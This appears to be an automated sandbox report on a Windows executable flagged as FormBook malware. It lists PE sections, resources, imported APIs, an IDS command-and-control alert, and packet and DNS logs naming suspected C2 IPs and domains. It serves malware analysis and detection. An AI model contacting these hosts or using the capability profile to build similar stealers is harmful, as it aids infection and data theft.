IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11f000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | f006ab74d3c653b5c5a6cc0c77a171a2 | False | 0.32829838446475196 | data | 5.7632462979925245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x56320 | 0x56400 | 43f3df0e76be63dc496f493c466bbfeb | False | 0.9238734148550725 | data | 7.884669776507797 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11f000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd07b8 | 0x4d5e8 | data | | | 1.0003344861535355
RT_GROUP_ICON | 0x11dda0 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11de18 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11de2c | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11de40 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11de54 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11df30 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Description | Data
Translation | 0x0809 0x04b0
Language of compilation system | Country where language is spoken
English | Great Britain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-01T09:04:00.390735+0200 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.4 | 49724 | 13.248.213.45 | 80 | TCP
• Total Packets: 152
• 80 (HTTP)
• 53 (DNS)
                                                            Apr 1, 2025 09:05:03.653471947 CEST804973547.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:16.819154978 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:17.108165026 CEST804973647.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:17.108251095 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:17.125931978 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:17.408420086 CEST804973647.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:18.088798046 CEST804973647.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:18.088856936 CEST804973647.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:18.089483023 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:18.636075974 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:19.660274982 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:19.944371939 CEST804973747.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:19.944483042 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:19.959129095 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:20.251585007 CEST804973747.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:20.805785894 CEST804973747.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:20.805807114 CEST804973747.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:20.805880070 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:21.464229107 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:22.483179092 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:22.771785975 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:22.771876097 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:22.833292961 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:23.128701925 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:23.128724098 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:23.797908068 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:23.797920942 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:23.799551010 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:24.342112064 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:25.358537912 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:25.650537968 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:25.650655985 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:25.659905910 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:25.942357063 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:26.658189058 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:26.658211946 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:26.658375978 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:26.662312984 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:26.961345911 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:31.926489115 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:32.096522093 CEST8049740162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:32.100218058 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:32.116102934 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:32.283509970 CEST8049740162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:32.284173012 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:33.620426893 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:34.639805079 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:34.803587914 CEST8049741162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:34.803698063 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:34.821824074 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:34.999754906 CEST8049741162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:34.999847889 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:36.323579073 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:37.343415976 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:37.508555889 CEST8049742162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:37.508634090 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:37.527936935 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:37.692194939 CEST8049742162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:37.692320108 CEST8049742162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:37.692370892 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:39.044867039 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.061067104 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.240211010 CEST8049743162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:40.240428925 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.252130985 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.421483994 CEST8049743162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:40.424222946 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.427191019 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.590544939 CEST8049743162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:45.627563000 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:05:46.755150080 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:05:48.807928085 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:05:52.892647028 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:00.901710033 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:07.983736038 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:09.078090906 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:11.095854044 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:15.198625088 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:23.198633909 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:30.233912945 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:31.266379118 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:33.275823116 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:37.293139935 CEST4974480192.168.2.4194.9.94.85
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 1, 2025 09:03:11.410608053 CEST5353086162.159.36.2192.168.2.4
                                                            Apr 1, 2025 09:03:17.952788115 CEST5311753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:18.225131035 CEST53531171.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:33.655392885 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:34.691181898 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:35.685921907 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:37.698370934 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:41.698461056 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:45.714806080 CEST6032653192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:45.803064108 CEST53603261.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:46.731940985 CEST6515753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:47.729831934 CEST6515753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:48.745316029 CEST6515753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:50.745239973 CEST6515753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:51.849114895 CEST53651571.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:51.849191904 CEST53651571.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:52.856453896 CEST5291453192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:52.957776070 CEST53529141.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:59.018047094 CEST5719553192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:59.165592909 CEST53571951.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:13.358824968 CEST5505853192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:13.486046076 CEST53550581.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:26.945852041 CEST5292153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:27.948574066 CEST5292153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:28.039468050 CEST53529211.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:36.092961073 CEST5284353192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:37.089287043 CEST5284353192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:37.178788900 CEST53528431.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:45.242784023 CEST6377853192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:45.339003086 CEST53637781.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:53.407294035 CEST6136353192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:53.507210970 CEST53613631.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:05:08.374314070 CEST5223153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:05:08.502291918 CEST53522311.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:05:16.562122107 CEST5818653192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:05:16.816375017 CEST53581861.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:05:31.671436071 CEST5925953192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:05:31.922574997 CEST53592591.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:05:45.436824083 CEST6218253192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:05:45.624501944 CEST53621821.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 1, 2025 09:03:17.952788115 CEST | 192.168.2.4 | 1.1.1.1 | 0x89f7 | Standard query (0) | www.031233226.xyz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:33.655392885 CEST | 192.168.2.4 | 1.1.1.1 | 0xc12e | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:34.691181898 CEST | 192.168.2.4 | 1.1.1.1 | 0xc12e | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:35.685921907 CEST | 192.168.2.4 | 1.1.1.1 | 0xc12e | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:37.698370934 CEST | 192.168.2.4 | 1.1.1.1 | 0xc12e | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:41.698461056 CEST | 192.168.2.4 | 1.1.1.1 | 0xc12e | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:45.714806080 CEST | 192.168.2.4 | 1.1.1.1 | 0xc690 | Standard query (0) | www.031233226.xyz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:46.731940985 CEST | 192.168.2.4 | 1.1.1.1 | 0xb676 | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:47.729831934 CEST | 192.168.2.4 | 1.1.1.1 | 0xb676 | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:48.745316029 CEST | 192.168.2.4 | 1.1.1.1 | 0xb676 | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:50.745239973 CEST | 192.168.2.4 | 1.1.1.1 | 0xb676 | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:52.856453896 CEST | 192.168.2.4 | 1.1.1.1 | 0x2514 | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:59.018047094 CEST | 192.168.2.4 | 1.1.1.1 | 0x7155 | Standard query (0) | www.woodsplace.net | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:13.358824968 CEST | 192.168.2.4 | 1.1.1.1 | 0xcc34 | Standard query (0) | www.sigaque.today | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:26.945852041 CEST | 192.168.2.4 | 1.1.1.1 | 0xe6b8 | Standard query (0) | www.kitculture.shop | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:27.948574066 CEST | 192.168.2.4 | 1.1.1.1 | 0xe6b8 | Standard query (0) | www.kitculture.shop | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:36.092961073 CEST | 192.168.2.4 | 1.1.1.1 | 0x8e56 | Standard query (0) | www.f66el619d.shop | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:37.089287043 CEST | 192.168.2.4 | 1.1.1.1 | 0x8e56 | Standard query (0) | www.f66el619d.shop | A (IP address) | IN (0x0001) | false
